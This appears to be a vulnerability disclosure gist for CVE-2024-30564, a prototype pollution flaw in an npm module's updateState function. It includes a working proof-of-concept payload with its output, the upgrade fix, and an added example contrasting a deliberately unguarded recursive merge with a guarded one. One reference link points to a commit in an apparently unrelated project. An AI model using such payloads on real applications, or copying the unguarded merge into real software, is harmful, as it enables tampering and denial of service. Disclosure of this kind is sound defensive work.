@mestrtee
Last active April 23, 2024 18:04
[CVE-2024-30564] Prototype Pollution vulnerability affecting @andrei-tatar/nora-firebase-common module, versions >=1.0.41, <=1.12.2

All versions of this module are vulnerable to Prototype Pollution via updateState. A user-supplied value reaches the vulnerable function updateStateInternal, which recursively copies all child properties of the source (the user-supplied value) to the destination without proper security validation.

An attacker can exploit this vulnerability to manipulate the prototype of Object, modifying the built-in Object.prototype through the reachable special properties __proto__ or constructor.prototype. This can potentially alter the behavior of all objects, and the attacker can consequently escalate the attack to denial of service, remote code execution or privilege escalation.

Call stack:

updateStateInternal (nora-firebase-common/build/update-state.js:54)
Module.updateState (nora-firebase-common/build/update-state.js:6)

PoC:

(async () => {
  const lib = await import('@andrei-tatar/nora-firebase-common');
  // Attacker-controlled input: JSON.parse creates an own "__proto__" key
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');

  const victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.updateState(BAD_JSON, {});
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Remove the marker property so the rest of the process is unaffected
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Expected output after the patch:

Before Attack:  {}
After Attack:  {}

How to prevent:

Upgrade to version 1.12.3 or later.
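
The class of defect and the usual guard against it, as an added example that is neither the module's own code nor its actual patch: an unguarded recursive merge of the kind described above, beside one that skips the special keys. The names `unsafeMerge`, `safeMerge` and `demo` are hypothetical, and the payload is constructed for the example.

```javascript
// Added illustration; not code from @andrei-tatar/nora-firebase-common.
// Keys that lead to Object.prototype when a recursive copy follows them.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
const isPlainObject = (v) =>
  v !== null && typeof v === 'object' && !Array.isArray(v);

// Unguarded recursive merge (hypothetical name): follows every source key.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      // For key "__proto__", target[key] resolves to Object.prototype.
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Guarded merge (hypothetical name): skips the special keys and only
// descends into objects that the target owns itself.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Merge a constructed payload, report whether a fresh object inherited the
// marker, then remove the marker so later code is unaffected.
function demo(mergeFn) {
  const payload = JSON.parse('{"__proto__":{"polluted":true},"on":true}');
  const state = mergeFn({}, payload);
  const leaked = ({}).polluted === true;
  delete Object.prototype.polluted;
  return { leaked, on: state.on };
}

console.log('unsafeMerge:', demo(unsafeMerge));
console.log('safeMerge:  ', demo(safeMerge));
```

The guarded version still copies the legitimate `on` field, so the check can sit in front of a merge without changing behavior for well-formed input.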

References

https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013

https://nvd.nist.gov/vuln/detail/CVE-2024-30564
